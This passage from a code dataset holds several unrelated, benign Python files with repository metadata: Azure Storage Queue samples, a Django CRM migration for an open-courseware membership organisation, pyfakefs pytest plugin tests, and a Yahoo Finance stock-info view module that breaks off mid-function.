last_page = next(message_batches)
for message in last_page:
print(message)
# [END receive_messages_listing]
finally:
queue.delete_queue()
def delete_and_clear_messages(self):
# Instantiate a queue client
from azure.storage.queue import QueueClient
queue = QueueClient.from_connection_string(self.connection_string, "myqueue5")
# Create the queue
queue.create_queue()
try:
# Send messages
queue.send_message(u"message1")
queue.send_message(u"message2")
queue.send_message(u"message3")
queue.send_message(u"message4")
queue.send_message(u"message5")
# [START delete_message]
# Get the message at the front of the queue
msg = next(queue.receive_messages())
# Delete the specified message
queue.delete_message(msg)
# [END delete_message]
# [START clear_messages]
queue.clear_messages()
# [END clear_messages]
finally:
# Delete the queue
queue.delete_queue()
def peek_messages(self):
# Instantiate a queue client
from azure.storage.queue import QueueClient
queue = QueueClient.from_connection_string(self.connection_string, "myqueue6")
# Create the queue
queue.create_queue()
try:
# Send messages
queue.send_message(u"message1")
queue.send_message(u"message2")
queue.send_message(u"message3")
queue.send_message(u"message4")
queue.send_message(u"message5")
# [START peek_message]
# Peek at one message at the front of the queue
msg = queue.peek_messages()
# Peek at the last 5 messages
messages = queue.peek_messages(max_messages=5)
# Print the last 5 messages
for message in messages:
print(message.content)
# [END peek_message]
finally:
# Delete the queue
queue.delete_queue()
def update_message(self):
# Instantiate a queue client
from azure.storage.queue import QueueClient
queue = QueueClient.from_connection_string(self.connection_string, "myqueue7")
# Create the queue
queue.create_queue()
try:
# [START update_message]
# Send a message
queue.send_message(u"update me")
# Receive the message
messages = queue.receive_messages()
# Update the message
list_result = next(messages)
message = queue.update_message(
list_result.id,
pop_receipt=list_result.pop_receipt,
visibility_timeout=0,
content=u"updated")
# [END update_message]
finally:
# Delete the queue
queue.delete_queue()
if __name__ == '__main__':
sample = QueueMessageSamples()
sample.set_access_policy()
sample.queue_metadata()
sample.send_and_receive_messages()
sample.list_message_pages()
sample.delete_and_clear_messages()
sample.peek_messages()
sample.update_message()
| 33.168421 | 102 | 0.602031 |
aedc65a505792ce89b7ef7e5b4ce9f9e0203a237 | 38,024 | py | Python | members/crm/migrations/0001_initial.py | ocwc/ocwc-members | 3ede8e0ff830e2aaff4ae09f9aaefd3eaa83146b | [
"MIT"
] | null | null | null | members/crm/migrations/0001_initial.py | ocwc/ocwc-members | 3ede8e0ff830e2aaff4ae09f9aaefd3eaa83146b | [
"MIT"
] | 7 | 2015-11-27T15:59:52.000Z | 2022-01-13T00:38:38.000Z | members/crm/migrations/0001_initial.py | ocwc/ocwc-members | 3ede8e0ff830e2aaff4ae09f9aaefd3eaa83146b | [
"MIT"
] | null | null | null | # -*- coding: utf-8 -*-
from __future__ import unicode_literals
from django.db import migrations, models
from django.conf import settings
class Migration(migrations.Migration):
dependencies = [migrations.swappable_dependency(settings.AUTH_USER_MODEL)]
operations = [
migrations.CreateModel(
name="Address",
fields=[
(
"id",
models.AutoField(
verbose_name="ID",
serialize=False,
auto_created=True,
primary_key=True,
),
),
(
"address_type",
models.CharField(
default=b"primary",
max_length=25,
choices=[
(b"primary", b"Primary Address"),
(b"billing", b"Billing Address"),
],
),
),
(
"street_address",
models.CharField(
help_text=b"Street address with street number",
max_length=255,
blank=True,
),
),
(
"supplemental_address_1",
models.CharField(max_length=255, blank=True),
),
(
"supplemental_address_2",
models.CharField(max_length=255, blank=True),
),
("city", models.CharField(max_length=255, blank=True)),
("postal_code", models.CharField(max_length=50, blank=True)),
("postal_code_suffix", models.CharField(max_length=255, blank=True)),
("state_province", models.CharField(max_length=255, blank=True)),
("state_province_abbr", models.CharField(max_length=255, blank=True)),
("latitude", models.FloatField(null=True, blank=True)),
("longitude", models.FloatField(null=True, blank=True)),
],
),
migrations.CreateModel(
name="BillingLog",
fields=[
(
"id",
models.AutoField(
verbose_name="ID",
serialize=False,
auto_created=True,
primary_key=True,
),
),
(
"log_type",
models.CharField(
max_length=30,
choices=[
(b"create_invoice", b"Create new invoice"),
(b"send_invoice", b"Send invoice via email"),
(b"create_paid_invoice", b"Create paid invoice"),
(b"send_paid_invoice", b"Send paid invoice via email"),
(b"create_note", b"Add a note"),
],
),
),
("pub_date", models.DateTimeField(auto_now_add=True)),
(
"created_date",
models.DateField(
null=True, verbose_name=b"Created Date (year-month-day)"
),
),
("amount", models.IntegerField(null=True)),
(
"email",
models.CharField(
max_length=120, verbose_name=b"Recepient email", blank=True
),
),
("invoice_year", models.CharField(default=b"2017", max_length=10)),
(
"invoice_number",
models.CharField(max_length=60, null=True, blank=True),
),
("description", models.TextField(default=b"", blank=True)),
("note", models.TextField(blank=True)),
(
"email_subject",
models.CharField(
max_length=140, verbose_name=b"Subject", blank=True
),
),
("email_body", models.TextField(verbose_name=b"Message", blank=True)),
],
),
migrations.CreateModel(
name="Contact",
fields=[
(
"id",
models.AutoField(
verbose_name="ID",
serialize=False,
auto_created=True,
primary_key=True,
),
),
(
"contact_type",
models.IntegerField(
choices=[
(4, b"Employee of"),
(6, b"Lead Contact for"),
(9, b"Certifier for"),
(10, b"Voting Representative"),
(11, b"Affiliated with"),
(12, b"AC Member of"),
]
),
),
("email", models.EmailField(max_length=255)),
(
"first_name",
models.CharField(default=b"", max_length=255, blank=True),
),
(
"last_name",
models.CharField(default=b"", max_length=255, blank=True),
),
(
"job_title",
models.CharField(default=b"", max_length=255, blank=True),
),
("bouncing", models.BooleanField(default=False)),
],
),
migrations.CreateModel(
name="Continent",
fields=[
(
"id",
models.AutoField(
verbose_name="ID",
serialize=False,
auto_created=True,
primary_key=True,
),
),
("name", models.CharField(unique=True, max_length=192, blank=True)),
],
),
migrations.CreateModel(
name="Country",
fields=[
(
"id",
models.AutoField(
verbose_name="ID",
serialize=False,
auto_created=True,
primary_key=True,
),
),
("name", models.CharField(unique=True, max_length=192, blank=True)),
("iso_code", models.CharField(unique=True, max_length=6, blank=True)),
("developing", models.BooleanField()),
(
"continent",
models.ForeignKey(
on_delete=models.CASCADE,
blank=True,
to="crm.Continent",
null=True,
),
),
],
options={"ordering": ("name",)},
),
migrations.CreateModel(
name="Invoice",
fields=[
(
"id",
models.AutoField(
verbose_name="ID",
serialize=False,
auto_created=True,
primary_key=True,
),
),
(
"invoice_type",
models.CharField(
default=b"issued",
max_length=30,
choices=[
(b"issued", b"Normal issued invoice"),
(b"paid", b"Invoice with paid watermark"),
],
),
),
("invoice_number", models.CharField(max_length=30, blank=True)),
("invoice_year", models.CharField(default=b"2017", max_length=10)),
("amount", models.IntegerField()),
("description", models.TextField(blank=True)),
("pdf_filename", models.CharField(max_length=100, blank=True)),
("access_key", models.CharField(max_length=32, blank=True)),
(
"created_date",
models.DateField(
null=True, verbose_name=b"Created Date (year-month-day)"
),
),
("paypal_link", models.TextField(blank=True)),
("pub_date", models.DateTimeField(auto_now_add=True)),
],
),
migrations.CreateModel(
name="LoginKey",
fields=[
(
"id",
models.AutoField(
verbose_name="ID",
serialize=False,
auto_created=True,
primary_key=True,
),
),
("email", models.EmailField(max_length=254)),
("key", models.CharField(max_length=32)),
("used", models.BooleanField(default=False)),
("pub_date", models.DateTimeField(auto_now_add=True)),
(
"user",
models.ForeignKey(
on_delete=models.CASCADE, to=settings.AUTH_USER_MODEL
),
),
],
),
migrations.CreateModel(
name="MembershipApplication",
fields=[
(
"id",
models.AutoField(
verbose_name="ID",
serialize=False,
auto_created=True,
primary_key=True,
),
),
(
"membership_type",
models.IntegerField(
default=None,
max_length=10,
null=True,
blank=True,
choices=[
(5, b"Institutional Members"),
(10, b"Institutional Members - MRC"),
(11, b"Institutional Members - DC"),
(12, b"Institutional Members - DC - MRC"),
(9, b"Associate Institutional Members"),
(17, b"Associate Institutional Members - DC"),
(6, b"Organizational Members"),
(13, b"Organizational Members - DC"),
(18, b"Organizational Members - MRC"),
(7, b"Associate Consortium Members"),
(14, b"Associate Consortium Members - DC"),
(8, b"Corporate Members - Basic"),
(15, b"Corporate Members - Premium"),
(16, b"Corporate Members - Sustaining"),
],
),
),
(
"display_name",
models.CharField(
max_length=255, verbose_name=b"Institution Name", blank=True
),
),
("edit_link_key", models.CharField(max_length=255, blank=True)),
("view_link_key", models.CharField(max_length=255, blank=True)),
(
"description",
models.TextField(
help_text=b"Please write between 1000 \xe2\x80\x93 1500 characters. <br />This information will be publicly displayed on your OEG profile site.",
blank=True,
),
),
("legacy_application_id", models.IntegerField(null=True, blank=True)),
("legacy_entity_id", models.IntegerField(null=True, blank=True)),
(
"main_website",
models.CharField(
max_length=765, verbose_name="Main Website address", blank=True
),
),
(
"ocw_website",
models.CharField(
max_length=765,
verbose_name="Open Educational Resources (OER) or OpenCourseWare (OCW) Website",
blank=True,
),
),
(
"logo_large",
models.ImageField(
upload_to=b"logos",
max_length=765,
verbose_name="Logo of your institution (at least 500x500px PNG or a vector (PDF, EPS) file)",
blank=True,
),
),
("logo_small", models.CharField(max_length=765, blank=True)),
("rss_course_feed", models.CharField(max_length=765, blank=True)),
("rss_referral_link", models.CharField(max_length=765, blank=True)),
(
"rss_course_feed_language",
models.CharField(max_length=765, blank=True),
),
("agreed_to_terms", models.CharField(max_length=765, blank=True)),
("agreed_criteria", models.CharField(max_length=765, blank=True)),
("contract_version", models.CharField(max_length=765, blank=True)),
("ocw_software_platform", models.CharField(max_length=765, blank=True)),
("ocw_platform_details", models.TextField(blank=True)),
("ocw_site_hosting", models.CharField(max_length=765, blank=True)),
("ocw_site_approved", models.NullBooleanField()),
(
"ocw_published_languages",
models.CharField(max_length=765, blank=True),
),
("ocw_license", models.CharField(max_length=765, blank=True)),
(
"organization_type",
models.CharField(
default=b"",
max_length=765,
blank=True,
choices=[
(b"university", b"Higher Education Institution"),
(b"npo", b"Non-Profit Organization"),
(b"ngo", b"Non-Governmental Organization"),
(b"regionalconsortium", b"Regional Consortium"),
(b"software", b"Software Development"),
(b"commercial", b"Commercial Entity"),
],
),
),
(
"institution_type",
models.CharField(
default=b"",
max_length=25,
blank=True,
choices=[
(b"higher-ed", b"Higher Education Institution"),
(b"secondary-ed", b"Secondary Education Institution"),
(b"primary-ed", b"Primary Education Institution"),
(b"npo", b"Non-Profit Organization"),
(b"ngo", b"Non-Governmental Organization"),
(b"igo", b"Intergovernmental Organization (IGO)"),
(b"gov", b"Governmental Entity"),
(b"consortium", b"Regional Consortium"),
(b"software", b"Software Development"),
(b"commercial", b"Commercial Entity"),
],
),
),
(
"is_accredited",
models.NullBooleanField(
default=None, choices=[(1, b"Yes"), (0, b"No")]
),
),
(
"accreditation_body",
models.CharField(default=b"", max_length=765, blank=True),
),
("ocw_launch_date", models.DateTimeField(null=True, blank=True)),
("support_commitment", models.TextField(blank=True)),
(
"app_status",
models.CharField(
blank=True,
max_length=255,
choices=[
(b"Submitted", b"Submitted"),
(b"Committee", b"Sent to Committee"),
(b"Approved", b"Approved"),
(b"Rejected", b"Rejected"),
(b"Spam", b"Spam"),
(b"RequestedMoreInfo", b"Requested more information"),
],
),
),
("created", models.DateTimeField(auto_now_add=True, null=True)),
("modified", models.DateTimeField(blank=True)),
(
"street_address",
models.CharField(
help_text=b"Street address with a street number",
max_length=255,
blank=True,
),
),
(
"supplemental_address_1",
models.CharField(
max_length=255, verbose_name="Street Address 2", blank=True
),
),
(
"supplemental_address_2",
models.CharField(
max_length=255, verbose_name="Street Address 3", blank=True
),
),
("city", models.CharField(max_length=255, blank=True)),
("postal_code", models.CharField(max_length=50, blank=True)),
(
"state_province",
models.CharField(
max_length=255, verbose_name="State/Province", blank=True
),
),
("email", models.EmailField(max_length=255, blank=True)),
(
"first_name",
models.CharField(default=b"", max_length=255, blank=True),
),
(
"last_name",
models.CharField(default=b"", max_length=255, blank=True),
),
(
"job_title",
models.CharField(default=b"", max_length=255, blank=True),
),
(
"simplified_membership_type",
models.CharField(
blank=True,
max_length=255,
choices=[
(b"institutional", b"Institutional Member"),
(b"associate", b"Associate Consortium Member"),
(b"organizational", b"Organizational Member"),
(b"corporate", b"Corporate Member"),
],
),
),
(
"corporate_support_levels",
models.CharField(
blank=True,
max_length=255,
choices=[
(b"basic", b"Basic - $1,000 annual membership fee"),
(
b"sustaining",
b"Sustaining - $30,000 contribution annual membership fee",
),
(
b"bronze",
b"Bronze - $60,000 contribution annual membership fee",
),
(
b"silver",
b"Silver - $100,000 contribution annual membership fee",
),
(
b"gold",
b"Gold - $150,000 contribution annual membership fee",
),
(
b"platinum",
b"Platinum - $250,000 contribution annual membership fee",
),
],
),
),
(
"associate_consortium",
models.CharField(
default=b"",
max_length=255,
blank=True,
choices=[
(
b"CCCOER",
b"Community College Consortium for Open Educational Resources (CCCOER)",
),
(b"CORE", b"CORE"),
(b"JOCWC", b"Japan OCW Consortium"),
(b"KOCWC", b"Korea OCW Consortium"),
(b"TOCWC", b"Taiwan OCW Consortium"),
(b"Turkish OCWC", b"Turkish OpenCourseWare Consortium"),
(b"UNIVERSIA", b"UNIVERSIA"),
(b"FOCW", b"OCW France"),
(b"OTHER", b"OTHER"),
],
),
),
("moa_terms", models.NullBooleanField()),
("terms_of_use", models.NullBooleanField()),
("coppa", models.NullBooleanField()),
(
"initiative_description1",
models.TextField(
default=b"",
verbose_name=b"Description (100 \xe2\x80\x93 350 characters)",
blank=True,
),
),
(
"initiative_url1",
models.URLField(
default=b"", max_length=255, verbose_name=b"URL", blank=True
),
),
(
"initiative_description2",
models.TextField(
default=b"",
verbose_name=b"Description (100 \xe2\x80\x93 350 characters)",
blank=True,
),
),
(
"initiative_url2",
models.URLField(
default=b"", max_length=255, verbose_name=b"URL", blank=True
),
),
(
"initiative_description3",
models.TextField(
default=b"",
verbose_name=b"Description (100 \xe2\x80\x93 350 characters)",
blank=True,
),
),
(
"initiative_url3",
models.URLField(
default=b"", max_length=255, verbose_name=b"URL", blank=True
),
),
(
"country",
models.ForeignKey(
on_delete=models.CASCADE,
related_name="app_country",
blank=True,
to="crm.Country",
null=True,
),
),
(
"institution_country",
models.ForeignKey(
on_delete=models.CASCADE,
blank=True,
to="crm.Country",
null=True,
),
),
],
),
migrations.CreateModel(
name="MembershipApplicationComment",
fields=[
(
"id",
models.AutoField(
verbose_name="ID",
serialize=False,
auto_created=True,
primary_key=True,
),
),
("legacy_comment_id", models.IntegerField(blank=True)),
("legacy_app_id", models.IntegerField(blank=True)),
("comment", models.TextField(blank=True)),
("sent_email", models.BooleanField(default=False)),
("app_status", models.CharField(max_length=255, blank=True)),
("created", models.DateTimeField()),
(
"application",
models.ForeignKey(
on_delete=models.CASCADE, to="crm.MembershipApplication"
),
),
],
),
migrations.CreateModel(
name="Organization",
fields=[
(
"id",
models.AutoField(
verbose_name="ID",
serialize=False,
auto_created=True,
primary_key=True,
),
),
("legal_name", models.CharField(max_length=255, blank=True)),
(
"display_name",
models.CharField(
max_length=255, verbose_name=b"Name of the organization"
),
),
("slug", models.CharField(default=b"", unique=True, max_length=30)),
(
"membership_type",
models.IntegerField(
max_length=10,
choices=[
(5, b"Institutional Members"),
(10, b"Institutional Members - MRC"),
(11, b"Institutional Members - DC"),
(12, b"Institutional Members - DC - MRC"),
(9, b"Associate Institutional Members"),
(17, b"Associate Institutional Members - DC"),
(6, b"Organizational Members"),
(13, b"Organizational Members - DC"),
(18, b"Organizational Members - MRC"),
(7, b"Associate Consortium Members"),
(14, b"Associate Consortium Members - DC"),
(8, b"Corporate Members - Basic"),
(15, b"Corporate Members - Premium"),
(16, b"Corporate Members - Sustaining"),
],
),
),
(
"membership_status",
models.IntegerField(
max_length=10,
choices=[
(1, b"Applied"),
(2, b"Current"),
(3, b"Grace"),
(4, b"Expired"),
(5, b"Pending"),
(6, b"Cancelled"),
(7, b"Sustaining"),
(99, b"Example"),
],
),
),
(
"associate_consortium",
models.CharField(
default=b"",
max_length=255,
blank=True,
choices=[
(
b"CCCOER",
b"Community College Consortium for Open Educational Resources (CCCOER)",
),
(b"CORE", b"CORE"),
(b"JOCWC", b"Japan OCW Consortium"),
(b"KOCWC", b"Korea OCW Consortium"),
(b"TOCWC", b"Taiwan OCW Consortium"),
(b"Turkish OCWC", b"Turkish OpenCourseWare Consortium"),
(b"UNIVERSIA", b"UNIVERSIA"),
(b"FOCW", b"OCW France"),
(b"OTHER", b"OTHER"),
],
),
),
(
"crmid",
models.CharField(
help_text=b"Legacy identifier", max_length=255, blank=True
),
),
("main_website", models.TextField(max_length=255, blank=True)),
(
"ocw_website",
models.TextField(
max_length=255, verbose_name=b"OCW Website", blank=True
),
),
("description", models.TextField(blank=True)),
(
"logo_large",
models.ImageField(max_length=255, upload_to=b"logos", blank=True),
),
(
"logo_small",
models.ImageField(max_length=255, upload_to=b"logos", blank=True),
),
("rss_course_feed", models.CharField(max_length=255, blank=True)),
(
"accreditation_body",
models.CharField(default=b"", max_length=255, blank=True),
),
("support_commitment", models.TextField(default=b"", blank=True)),
("created", models.DateTimeField(auto_now_add=True, null=True)),
(
"institution_type",
models.CharField(
default=b"",
max_length=25,
blank=True,
choices=[
(b"higher-ed", b"Higher Education Institution"),
(b"secondary-ed", b"Secondary Education Institution"),
(b"primary-ed", b"Primary Education Institution"),
(b"npo", b"Non-Profit Organization"),
(b"ngo", b"Non-Governmental Organization"),
(b"igo", b"Intergovernmental Organization (IGO)"),
(b"gov", b"Governmental Entity"),
(b"consortium", b"Regional Consortium"),
(b"software", b"Software Development"),
(b"commercial", b"Commercial Entity"),
],
),
),
(
"initiative_description1",
models.TextField(
default=b"",
verbose_name=b"Description (100 \xe2\x80\x93 350 characters)",
blank=True,
),
),
(
"initiative_url1",
models.URLField(
default=b"", max_length=255, verbose_name=b"URL", blank=True
),
),
(
"initiative_description2",
models.TextField(
default=b"",
verbose_name=b"Description (100 \xe2\x80\x93 350 characters)",
blank=True,
),
),
(
"initiative_url2",
models.URLField(
default=b"", max_length=255, verbose_name=b"URL", blank=True
),
),
(
"initiative_description3",
models.TextField(
default=b"",
verbose_name=b"Description (100 \xe2\x80\x93 350 characters)",
blank=True,
),
),
(
"initiative_url3",
models.URLField(
default=b"", max_length=255, verbose_name=b"URL", blank=True
),
),
(
"ocw_contact",
models.ForeignKey(
on_delete=models.CASCADE,
related_name="ocw_contact_user",
verbose_name="Primary contact inside OCW",
to=settings.AUTH_USER_MODEL,
null=True,
),
),
(
"user",
models.ForeignKey(
on_delete=models.CASCADE,
blank=True,
to=settings.AUTH_USER_MODEL,
null=True,
),
),
],
),
migrations.CreateModel(
name="ReportedStatistic",
fields=[
(
"id",
models.AutoField(
verbose_name="ID",
serialize=False,
auto_created=True,
primary_key=True,
),
),
("report_month", models.CharField(max_length=6)),
("report_year", models.CharField(max_length=12)),
("site_visits", models.IntegerField()),
("orig_courses", models.IntegerField(verbose_name="Original Courses")),
(
"trans_courses",
models.IntegerField(verbose_name="Translated Courses"),
),
(
"orig_course_lang",
models.TextField(
verbose_name="Original Courses Language", blank=True
),
),
(
"trans_course_lang",
models.TextField(
null=True,
verbose_name="Translated Courses Language",
blank=True,
),
),
(
"oer_resources",
models.IntegerField(
null=True, verbose_name="Number of OER Resources", blank=True
),
),
(
"trans_oer_resources",
models.IntegerField(
null=True,
verbose_name="Number of Translated OER Resources",
blank=True,
),
),
(
"comment",
models.TextField(null=True, verbose_name="Comment", blank=True),
),
("report_date", models.DateField(verbose_name="Reported period")),
("last_modified", models.DateTimeField(auto_now_add=True)),
("carry_forward", models.BooleanField(default=False)),
(
"organization",
models.ForeignKey(on_delete=models.CASCADE, to="crm.Organization"),
),
],
),
migrations.AddField(
model_name="membershipapplication",
name="organization",
field=models.ForeignKey(
on_delete=models.CASCADE,
blank=True,
to="crm.Organization",
help_text=b"Should be empty, unless application is approved",
null=True,
),
),
migrations.AddField(
model_name="invoice",
name="organization",
field=models.ForeignKey(on_delete=models.CASCADE, to="crm.Organization"),
),
migrations.AddField(
model_name="contact",
name="organization",
field=models.ForeignKey(on_delete=models.CASCADE, to="crm.Organization"),
),
migrations.AddField(
model_name="billinglog",
name="invoice",
field=models.ForeignKey(
on_delete=models.CASCADE, blank=True, to="crm.Invoice", null=True
),
),
migrations.AddField(
model_name="billinglog",
name="organization",
field=models.ForeignKey(on_delete=models.CASCADE, to="crm.Organization"),
),
migrations.AddField(
model_name="billinglog",
name="user",
field=models.ForeignKey(
on_delete=models.CASCADE, to=settings.AUTH_USER_MODEL
),
),
migrations.AddField(
model_name="address",
name="country",
field=models.ForeignKey(
on_delete=models.CASCADE, blank=True, to="crm.Country", null=True
),
),
migrations.AddField(
model_name="address",
name="organization",
field=models.ForeignKey(on_delete=models.CASCADE, to="crm.Organization"),
),
]
| 41.018339 | 169 | 0.381917 |
3d40537e043d125442bd81a1cedc883deca3e871 | 293 | py | Python | __init__.py | ponyatov/metaLpy | 96149313e8083536ade1c331825242f6996f05b3 | [
"MIT"
] | null | null | null | __init__.py | ponyatov/metaLpy | 96149313e8083536ade1c331825242f6996f05b3 | [
"MIT"
] | null | null | null | __init__.py | ponyatov/metaLpy | 96149313e8083536ade1c331825242f6996f05b3 | [
"MIT"
] | null | null | null | ## @file
## `metaL`: homoiconic interpreter engine
## (c) Dmitry Ponyatov <<dponyatov@gmail.com>> 2020 MIT
## * homoiconic interpreter engine
## * in-memory object graph database
## * interactive programming system
from .core import *
from .geo import *
from .gui import *
from .web import *
| 24.416667 | 55 | 0.716724 |
b0a79b256b1d75520f8e80e30cfa42a49a26fa40 | 1,396 | py | Python | pyfakefs/pytest_tests/pytest_plugin_test.py | pexip/os-python-pyfakefs | 72a3de0608582f4d25df0ff0528c5a45a5668443 | [
"Apache-2.0"
] | null | null | null | pyfakefs/pytest_tests/pytest_plugin_test.py | pexip/os-python-pyfakefs | 72a3de0608582f4d25df0ff0528c5a45a5668443 | [
"Apache-2.0"
] | null | null | null | pyfakefs/pytest_tests/pytest_plugin_test.py | pexip/os-python-pyfakefs | 72a3de0608582f4d25df0ff0528c5a45a5668443 | [
"Apache-2.0"
] | null | null | null | """Tests that the pytest plugin properly provides the "fs" fixture"""
import os
import tempfile
from pyfakefs.fake_filesystem_unittest import Pause
def test_fs_fixture(fs):
fs.create_file('/var/data/xx1.txt')
assert os.path.exists('/var/data/xx1.txt')
def test_pause_resume(fs):
fake_temp_file = tempfile.NamedTemporaryFile()
assert fs.exists(fake_temp_file.name)
assert os.path.exists(fake_temp_file.name)
fs.pause()
assert fs.exists(fake_temp_file.name)
assert not os.path.exists(fake_temp_file.name)
real_temp_file = tempfile.NamedTemporaryFile()
assert not fs.exists(real_temp_file.name)
assert os.path.exists(real_temp_file.name)
fs.resume()
assert not os.path.exists(real_temp_file.name)
assert os.path.exists(fake_temp_file.name)
def test_pause_resume_contextmanager(fs):
fake_temp_file = tempfile.NamedTemporaryFile()
assert fs.exists(fake_temp_file.name)
assert os.path.exists(fake_temp_file.name)
with Pause(fs):
assert fs.exists(fake_temp_file.name)
assert not os.path.exists(fake_temp_file.name)
real_temp_file = tempfile.NamedTemporaryFile()
assert not fs.exists(real_temp_file.name)
assert os.path.exists(real_temp_file.name)
assert not os.path.exists(real_temp_file.name)
assert os.path.exists(fake_temp_file.name)
| 34.9 | 70 | 0.725645 |
d0eaa43b0025c952520d763665a4e6d19899e070 | 13,177 | py | Python | gamestonk_terminal/fundamental_analysis/yahoo_finance_view.py | keshabb/GamestonkTerminal | a0acdfb13f806c35c82a7c4dc81ea98de52814e0 | [
"MIT"
] | null | null | null | gamestonk_terminal/fundamental_analysis/yahoo_finance_view.py | keshabb/GamestonkTerminal | a0acdfb13f806c35c82a7c4dc81ea98de52814e0 | [
"MIT"
] | 1 | 2022-02-10T06:49:37.000Z | 2022-02-10T06:49:37.000Z | gamestonk_terminal/fundamental_analysis/yahoo_finance_view.py | hcksystem/GamestonkTerminal | 7a8a4f868c548505c36287d16f969e80daeed431 | [
"MIT"
] | null | null | null | """ Yahoo Finance View """
__docformat__ = "numpy"
import argparse
from typing import List
from datetime import datetime
import webbrowser
import yfinance as yf
import pandas as pd
from gamestonk_terminal.fundamental_analysis.fa_helper import clean_df_index
from gamestonk_terminal.helper_funcs import (
long_number_format,
parse_known_args_and_warn,
)
def headquarters(other_args: List[str], ticker: str):
"""Headquarters location of the company
Parameters
----------
other_args : List[str]
argparse other args
ticker : str
Fundamental analysis ticker symbol
"""
parser = argparse.ArgumentParser(
add_help=False,
formatter_class=argparse.ArgumentDefaultsHelpFormatter,
prog="hq",
description="""
Opens in Google Maps HQ location of the company. [Source: Yahoo Finance]
""",
)
try:
ns_parser = parse_known_args_and_warn(parser, other_args)
if not ns_parser:
return
stock = yf.Ticker(ticker)
df_info = pd.DataFrame(stock.info.items(), columns=["Metric", "Value"])
df_info = df_info.set_index("Metric")
maps = "https://www.google.com/maps/search/"
for field in ["address1", "address2", "city", "state", "zip", "country"]:
if field in df_info.index:
maps += (
df_info[df_info.index == field]["Value"].values[0].replace(" ", "+")
+ ","
)
webbrowser.open(maps[:-1])
print("")
except Exception as e:
print(e, "\n")
def web(other_args: List[str], ticker: str):
"""Website of the company
Parameters
----------
other_args : List[str]
argparse other args
ticker : str
Fundamental analysis ticker symbol
"""
parser = argparse.ArgumentParser(
add_help=False,
formatter_class=argparse.ArgumentDefaultsHelpFormatter,
prog="web",
description="""
Opens company's website. [Source: Yahoo Finance]
""",
)
try:
ns_parser = parse_known_args_and_warn(parser, other_args)
if not ns_parser:
return
stock = yf.Ticker(ticker)
df_info = pd.DataFrame(stock.info.items(), columns=["Metric", "Value"])
webbrowser.open(df_info[df_info["Metric"] == "website"]["Value"].values[0])
print("")
except Exception as e:
print(e, "\n")
def info(other_args: List[str], ticker: str):
"""Yahoo Finance ticker info
Parameters
----------
other_args : List[str]
argparse other args
ticker : str
Fundamental analysis ticker symbol
"""
parser = argparse.ArgumentParser(
add_help=False,
formatter_class=argparse.ArgumentDefaultsHelpFormatter,
prog="info",
description="""
Print information about the company. The following fields are expected:
Zip, Sector, Full time employees, Long business summary, City, Phone, State, Country,
Website, Max age, Address, Industry, Previous close, Regular market open, Two hundred
day average, Payout ratio, Regular market day high, Average daily volume 10 day,
Regular market previous close, Fifty day average, Open, Average volume 10 days, Beta,
Regular market day low, Price hint, Currency, Trailing PE, Regular market volume,
Market cap, Average volume, Price to sales trailing 12 months, Day low, Ask, Ask size,
Volume, Fifty two week high, Forward PE, Fifty two week low, Bid, Tradeable, Bid size,
Day high, Exchange, Short name, Long name, Exchange timezone name, Exchange timezone
short name, Is esg populated, Gmt off set milliseconds, Quote type, Symbol, Message
board id, Market, Enterprise to revenue, Profit margins, Enterprise to ebitda, 52 week
change, Forward EPS, Shares outstanding, Book value, Shares short, Shares percent
shares out, Last fiscal year end, Held percent institutions, Net income to common,
Trailing EPS, Sand p52 week change, Price to book, Held percent insiders, Next fiscal
year end, Most recent quarter, Short ratio, Shares short previous month date, Float
shares, Enterprise value, Last split date, Last split factor, Earnings quarterly growth,
Date short interest, PEG ratio, Short percent of float, Shares short prior month,
Regular market price, Logo_url. [Source: Yahoo Finance]
""",
)
try:
ns_parser = parse_known_args_and_warn(parser, other_args)
if not ns_parser:
return
stock = yf.Ticker(ticker)
df_info = pd.DataFrame(stock.info.items(), columns=["Metric", "Value"])
df_info = df_info.set_index("Metric")
clean_df_index(df_info)
if (
"Last split date" in df_info.index
and df_info.loc["Last split date"].values[0]
):
df_info.loc["Last split date"].values[0] = datetime.fromtimestamp(
df_info.loc["Last split date"].values[0]
).strftime("%d/%m/%Y")
df_info = df_info.mask(df_info["Value"].astype(str).eq("[]")).dropna()
df_info[df_info.index != "Zip"] = df_info[df_info.index != "Zip"].applymap(
lambda x: long_number_format(x)
)
df_info = df_info.rename(
index={
"Address1": "Address",
"Average daily volume10 day": "Average daily volume 10 day",
"Average volume10days": "Average volume 10 days",
"Price to sales trailing12 months": "Price to sales trailing 12 months",
}
)
df_info.index = df_info.index.str.replace("eps", "EPS")
df_info.index = df_info.index.str.replace("p e", "PE")
df_info.index = df_info.index.str.replace("Peg", "PEG")
pd.set_option("display.max_colwidth", None)
if "Long business summary" in df_info.index:
print(df_info.drop(index=["Long business summary"]).to_string(header=False))
print("")
print(df_info.loc["Long business summary"].values[0])
print("")
else:
print(df_info.to_string(header=False))
print("")
except Exception as e:
print(e, "\n")
def shareholders(other_args: List[str], ticker: str):
"""Yahoo Finance ticker shareholders
Parameters
----------
other_args : List[str]
argparse other args
ticker : str
Fundamental analysis ticker symbol
"""
parser = argparse.ArgumentParser(
add_help=False,
formatter_class=argparse.ArgumentDefaultsHelpFormatter,
prog="shrs",
description="""Print Major, institutional and mutualfunds shareholders.
[Source: Yahoo Finance]""",
)
try:
ns_parser = parse_known_args_and_warn(parser, other_args)
if not ns_parser:
return
stock = yf.Ticker(ticker)
pd.set_option("display.max_colwidth", None)
# Major holders
print("Major holders")
df_major_holders = stock.major_holders
df_major_holders[1] = df_major_holders[1].apply(
lambda x: x.replace("%", "Percentage")
)
print(df_major_holders.to_string(index=False, header=False))
print("")
# Institutional holders
print("Institutional holders")
df_institutional_shareholders = stock.institutional_holders
df_institutional_shareholders.columns = (
df_institutional_shareholders.columns.str.replace("% Out", "Stake")
)
df_institutional_shareholders["Shares"] = df_institutional_shareholders[
"Shares"
].apply(lambda x: long_number_format(x))
df_institutional_shareholders["Value"] = df_institutional_shareholders[
"Value"
].apply(lambda x: long_number_format(x))
df_institutional_shareholders["Stake"] = df_institutional_shareholders[
"Stake"
].apply(lambda x: str(f"{100 * x:.2f}") + " %")
print(df_institutional_shareholders.to_string(index=False))
print("")
# Mutualfunds holders
print("Mutualfunds holders")
df_mutualfund_shareholders = stock.mutualfund_holders
df_mutualfund_shareholders.columns = (
df_mutualfund_shareholders.columns.str.replace("% Out", "Stake")
)
df_mutualfund_shareholders["Shares"] = df_mutualfund_shareholders[
"Shares"
].apply(lambda x: long_number_format(x))
df_mutualfund_shareholders["Value"] = df_mutualfund_shareholders["Value"].apply(
lambda x: long_number_format(x)
)
